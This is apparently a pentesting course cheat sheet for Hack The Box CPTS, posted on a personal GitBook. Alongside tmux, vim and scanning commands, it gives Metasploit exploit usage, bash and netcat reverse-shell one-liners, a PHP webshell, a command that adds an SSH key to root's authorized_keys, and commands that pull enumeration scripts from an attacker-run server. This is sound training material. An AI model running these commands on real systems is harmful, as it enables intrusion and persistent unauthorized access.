👽
ALi3nW3rX
  • 👽ALi3NW3RX - Home Page
  • 🧧Resources
  • MITRE ATT&CK
  • Cyber Kill Chain
  • Education
    • ⚪Training Platforms
      • Attack & Defense
      • Hack The Box
      • Hack The Box Academy
      • Pentester Academy
      • Pentester Lab
      • PortSwigger Academy
      • Proving Grounds (PGP)
      • PwnTillDawn
      • Try Hack Me
    • 🟣Courses
      • Free Courses
        • API Penetration Testing Course
      • Paid Courses
        • OSCP
        • Pentester Academy
          • CRTP
            • CRTP Step By Step In Objectives
              • Obj 1 Enumeration
              • Obj 2 Enumeration
              • Obj 3 Enumeration
              • Obj 4 Enumeration
              • Obj 5 Local Priv Esc
              • Obj 6 BloodHound
              • Obj 7 Derivative Local Admin
              • Obj 8 Golden Ticket / DCSync
              • Obj 9 Silver Ticket for Host
              • Obj 10 Skeleton Key
              • Obj 11 DSRM
              • Obj 12 DCSync
              • Obj 13 Security Descriptors
              • Obj 14 Kerberoast Pass Crack
              • Obj 15 Unconstrained Delegation
            • CRTP Diagrams
          • CRTE
        • Hack The Box
          • CPTS
            • Common Terms (Cheat Sheet)
            • OWASP Top 10 2021
            • ACTIVE DIRECTORY ENUMERATION & ATTACKS
              • Enum Cheat Sheet
              • Tools of The Trade
              • Initial Enumeration of the Domain
              • LLMNR/NBT-NS Poisoning - from Linux
              • LLMNR/NBT-NS Poisoning - from Windows
              • Password Spraying Overview
              • Enumerating & Retrieving Password Policies
              • Password Spraying - Making a Target User List
              • Page 4
              • Page 3
              • Page 1
            • Page 2
  • Reverse Shells
    • revshells.com
  • C2
    • 🔴Cobalt Strike
      • Articles & Instructions
      • Resources
        • CS Cheat Sheet
        • Command Reference
        • Aggressor Scripts
        • RedTeam-OffensiveSecurity
      • Videos
  • WINDOWS
    • Active Directory Attack Map
    • Wadcoms
    • 🟢Recon
    • 🟢Enumeration
      • No Credentials
      • PowerView Enumeration
        • WMI
        • Domain Enumeration
        • Domain Trusts
        • Users
          • Find Local Admin Access
          • Find Active Sessions
        • Groups
        • Computers
        • Shares
        • GPO's
        • OU's
        • ACL's
      • Valid Credentials
    • 🟡FootHold
    • 🟡Local Priv Esc
      • PowerUp
      • ByPasses
      • Local Privilege Escalation
        • Local Priv Esc Using PowerUp.ps1
      • DSRM
    • 🟠Credential Harvesting
      • Dump NTDS.dit
    • 🟠Post Exploitation
    • 🟠Persistence
    • 🔴Domain Priv Esc
      • Domain Privilege Escalation
        • Enterprise Admins
        • DNS Admins
        • Constrained Delegation
        • Unconstrained Delegation
        • Set SPN
        • AS-REPS Roasting
        • Kerberoast
    • 🔴Lateral Movement & Pivoting
      • Lateral Movement
      • PowerShell Remoting
      • Reverse Shells
      • Pass The Hash
      • Over Pass The Hash
    • 🔴Attacks
      • DCSync
      • ACL
      • DSRM
      • AdminSDHolder
      • Print Nightmare
    • 🔴Forests & Trusts
      • Cross Forest Attacks
    • 🔵Defense & Hardening
    • 🔧Tools
      • BloodHound
      • Certipy
      • Commando-VM
      • CrackMapExec
        • CME Quick Reference
        • Protocols
          • SSH
            • Password Spraying
            • Authentication
            • Command Execution
          • MSSQL
            • Password Spraying
            • Authentication
            • Privesc
            • Command Execution
            • Upload/Download
            • Windows Commands
          • LDAP
            • Authentication
            • ASREPRoast
            • Find Domain SID
            • Kerberoasting
            • Unconstrained delegation
            • Admin Count
            • Machine Account Quota
            • Get user descriptions
            • Dump GMSA
            • Exploit ESC8 (ADCS)
            • Extract Subnet
            • LDAP Signing
            • Read DACL rights
          • FTP
            • Password Spraying
          • WINRM
            • Password Spraying
            • Authentication
            • Command Execution
            • LAPS
          • RDP
            • Password Spraying
            • Screenshot (Connected)
            • Screenshot (Not Connected)
        • Using Kerberos
        • Using Modules
        • Using The Database
        • BloodHound Integration
        • Scan for Vulnerabilities
        • Enumeration
          • Hosts
          • Null Sessions
          • Anonymous Login
          • Active Sessions
          • Shares and Access
          • Disks
          • Logged on Users
          • Domain Users
          • Users BruteForce RID
          • Domain Groups
          • Local Groups
          • Password Policy
          • SMB Signing NOT Required
        • Password Spraying
        • Authentication
          • Checking Domain Credentials
          • Checking Local Credentials
        • Command Execution
          • Remote Command Execution
          • Shells
        • Spidering Shares
        • Get and Put Files
        • Obtaining Credentials
          • Dump SAM
          • Dump LSA
          • Dump NTDS.dit
          • Dump LSASS
          • Dump WIFI Password
          • Dump KeyPass
        • LAPS
        • Spooler / WebDAV
        • MS Teams Cookies
      • Forensia
      • Inveigh
      • LaZagne
      • Ligolo / SSH Tunneling
      • LinWinPwn
      • MimiKatz.ps1
        • Golden Ticket
        • Silver Ticket
        • Skeleton Key
      • Rubeus
      • SharpCollection
      • SQLRecon
    • ✍️Scripts
      • FilelessNTDllReflection
      • FilelessRemotePE
      • ExecRemoteAssembly
  • Offensive Programming
    • RUST
      • Links
  • LINUX
    • Linux Terminal Commands
      • Git Cheat Sheet
      • Grep Cheat Sheet
    • Path to Root
    • Bash Cheat Sheet
    • Priv Esc
      • LD_Preload / SETENV
  • WEB APPS
    • Web Apps
      • LFI
      • XXE
  • DATABASES
    • Mysql
    • Postgresql
    • Redis
  • Common Tools & Commands
    • Protocols
      • FTP
      • RDP
      • SMB
      • SSH
    • Primary Tools
      • Hashcat
      • Responder
      • SQLMap
      • Chisel
      • CURL
      • XFREERDP
      • SSH
      • GOBUSTER
      • SNMP
      • NMAP
      • SMBCLIENT
      • WHATWEB
    • Editors
      • VIM
    • Misc Tools
      • ChatGPT
  • NETWORKING
    • Subnetting Cheat Sheet
  • SCRIPTS
    • Enum Scripts
  • MISC
    • Programming
      • GO
        • GoLangBot.Com
        • Ping Sweeper
      • NIM
    • Temp - Notes
Powered by GitBook
On this page
  • General
  • TMUX
  • Vim
  • Pentesting Commands
  • Service Scanning
  • Web Enumeration
  • Public Exploits
  • Using Shells
  • Privilege Escalation
  • Transfering Files
  1. Education
  2. Courses
  3. Paid Courses
  4. Hack The Box
  5. CPTS

Common Terms (Cheat Sheet)

Here are some of the most common terms and technologies that we will come across repeatedly and must have a firm grasp of. This is not an exhaustive list but is enough to get started with.

General

sudo openvpn user.ovpn ##Connect to VPN
ifconfig/ip a ##Show our IP address
netstat -rn ##Show networks accessible via the VPN
ssh user@10.10.10.10 ## SSH to a remote server
ftp 10.129.42.253

TMUX

tmux ## Start tmux
ctrl+b ## tmux: default prefix
prefix c ## tmux: new window
prefix 1 ## tmux: switch to window (1)
prefix shift++% ## tmux: split pane vertically
prefix shift+" ## tmux: split pane horizontally
prefix -> ## tmux: switch to the right pane

Vim

vim file	vim: open file with vim
esc+i	## vim: enter insert mode
esc	## vim: back to normal mode
x	## vim: Cut character
dw	## vim: Cut word
dd	## vim: Cut full line
yw	## vim: Copy word
yy	## vim: Copy full line
p	## vim: Paste
:1	## vim: Go to line number 1.
:w	## vim: Write the file 'i.e. save'
:q	## vim: Quit
:q!	## vim: Quit without saving
:wq	## vim: Write and quit

Pentesting Commands

Service Scanning

nmap 10.129.42.253	##Run nmap on an IP
nmap -sV -sC -p- 10.129.42.253	##Run an nmap script scan on an IP
locate scripts/citrix	##List various available nmap scripts
nmap --script smb-os-discovery.nse -p445 10.10.10.40	##Run an nmap script on an IP
netcat 10.10.10.10 22	##Grab banner of an open port
smbclient -N -L \\\\10.129.42.253	##List SMB Shares
smbclient \\\\10.129.42.253\\users	##Connect to an SMB share
snmpwalk -v 2c -c public 10.129.42.253 1.3.6.1.2.1.1.5.0	##Scan SNMP on an IP
onesixtyone -c dict.txt 10.129.42.254	##Brute force SNMP secret string

Web Enumeration

gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt ## Run a directory scan on a website
gobuster dns -d inlanefreight.com -w /usr/share/SecLists/Discovery/DNS/namelist.txt ##Run a sub-domain scan on a website
curl -IL https://www.inlanefreight.com	## Grab website banner
whatweb 10.10.10.121 ##List details about the webserver/certificates
curl 10.10.10.121/robots.txt ## List potential directories in robots.txt
ctrl+u ## View Page source (in Firefox)

Public Exploits

searchsploit openssh 7.2 ## Search for public exploits for a web application
msfconsole ##MSF: Start the Metasploit Framework
search exploit eternalblue ## MSF: Search for public exploits in MSF
use exploit/windows/smb/ms17_010_psexec	MSF: ## Start using an MSF module
show options ## MSF: Show required options for an MSF module
set RHOSTS 10.10.10.40 ## MSF: Set a value for an MSF module option
check ## MSF: Test if the target server is vulnerable
exploit ## MSF: Run the exploit on the target server is vulnerable

Using Shells

nc -lvnp 1234 ## Start a nc listener on a local port
bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1' ## send a reverse shell from the remote server
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f	##Another command to send a reverse shell from the remote server
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f ## Start a bind shell on the remote server
nc 10.10.10.1 1234 ## Connect to a bind shell started on the remote server
python -c 'import pty; pty.spawn("/bin/bash")'	## Upgrade shell TTY (1)
ctrl+z then stty raw -echo then fg then enter twice ## Upgrade shell TTY (2)
echo "<?php system(\$_GET['cmd']);?>" > /var/www/html/shell.php	##Create a webshell php file
curl http://SERVER_IP:PORT/shell.php?cmd=id ## Execute a command on an uploaded webshell

Privilege Escalation

./linpeas.sh ## Run linpeas script to enumerate remote server
sudo -l	## List available sudo privileges
sudo -u user /bin/echo Hello World! ## Run a command with sudo
sudo su - ## Switch to root user (if we have access to sudo su)
sudo su user - ## Switch to a user (if we have access to sudo su)
ssh-keygen -f key ## Create a new SSH key
echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys ## Add the generated public key to the user
ssh root@10.10.10.10 -i key ## SSH to the server with the generated private key

Transfering Files

python3 -m http.server 8000 ## Start a local webserver
wget http://10.10.14.1:8000/linpeas.sh ## Download a file on the remote server from our local machine
curl http://10.10.14.1:8000/linenum.sh -o linenum.sh ## Download a file on the remote server from our local machine
scp linenum.sh user@remotehost:/tmp/linenum.sh ## Transfer a file to the remote server with scp (requires SSH access)
base64 shell -w 0 ## Convert a file to base64
echo f0VMR...SNIO...InmDwU | base64 -d > shell ## Convert a file from base64 back to its orig
md5sum shell ## Check the file's md5sum to ensure it converted correctly
PreviousCPTSNextOWASP Top 10 2021

Last updated 2 years ago

-

🟣
Vim Cheat Sheet
Advanced Vim Cheat Sheet